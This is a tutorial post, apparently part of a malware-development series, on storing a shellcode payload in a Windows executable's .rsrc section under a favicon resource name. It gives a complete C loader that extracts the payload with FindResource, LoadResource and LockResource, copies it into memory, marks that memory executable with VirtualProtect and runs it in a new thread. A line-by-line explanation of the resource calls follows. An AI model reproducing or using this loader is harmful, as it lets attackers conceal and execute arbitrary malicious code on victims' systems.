Storing Payload in .rsrc Section

.rsrc

The .rsrc section is a special section in a Windows executable file that contains the resources used by the program. These resources can include icons, bitmaps, menus, dialog boxes, strings, and other data that is needed by the program at runtime.

When an executable is compiled, the resources are typically stored in a separate file called a resource file (.rc), which is then compiled into a binary format and added to the .rsrc section of the executable. This makes it possible for the program to access the resources at runtime, without having to read them from a separate file on disk.

When a program needs to access a resource, it typically uses the Win32 API functions FindResource, LoadResource, and LockResource to access the payload data from within the executable. The FindResource function searches for the resource in the .rsrc section, the LoadResource function loads the resource into memory, and the LockResource function returns a pointer to the resource data that you can then use to access the payload.

Code :

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "resources.h"

int main(void) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
    	DWORD oldprotect = 0;
	HGLOBAL resHandle = NULL;
	HRSRC res;
	
	unsigned char * payload;
	unsigned int payload_len;
	
	// Extract payload from resources section
	res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
	resHandle = LoadResource(NULL, res);
	payload = (char *) LockResource(resHandle);
	payload_len = SizeofResource(NULL, res);
	
	// Allocate some memory buffer for payload
	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
	printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

	// Copy payload to new memory buffer
	RtlMoveMemory(exec_mem, payload, payload_len);
	
	// Make the buffer executable
	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

	// Launch the payload
	if ( rv != 0 ) {
			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
			WaitForSingleObject(th, -1);
	}

	return 0;
}

Code Explanation :

• HGLOBAL resHandle, HRSRC res : resHandle and res are used to store the handle to a resource and HGLOBAL and HRSRC are data types defined in the Windows API for handling resource For example, HGLOBAL can hold the handle to a loaded resource, and HRSRC can hold the handle to a resource being searched for

• res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA) : Uses the FindResource function to locate a resource within the executable. The NULL parameter indicates that the function should search for the resource in the current module. MAKEINTRESOURCE(FAVICON_ICO)is used to create a resource identifier based on the FAVICON_ICO value. RT_RCDATA stands for "read-only data resource" is the resource type, indicating that the resource is a user-defined data resource.

• resHandle = LoadResource(NULL, res) : Uses the LoadResource function to load the specified resource. It takes the NULL parameter to indicate the current module and the res handle obtained from the previous step. The result is stored in resHandle, which represents the loaded resource.

• payload = (char*)LockResource(resHandle) : Uses the LockResource function to obtain the address of the resource data. The LockResource function takes the resHandle obtained from LoadResource and returns a pointer to the resource data. It's cast to (char*) to match the type of payload.

• payload_len = SizeofResource(NULL, res) : Uses the SizeofResource function to determine the size (length) of the resource. It takes the NULL parameter to indicate the current module and the res handle obtained from FindResource. The resulting size is stored in payload_len.

the rest of the code is the same as the .text section code so you can check here for more explanation of the code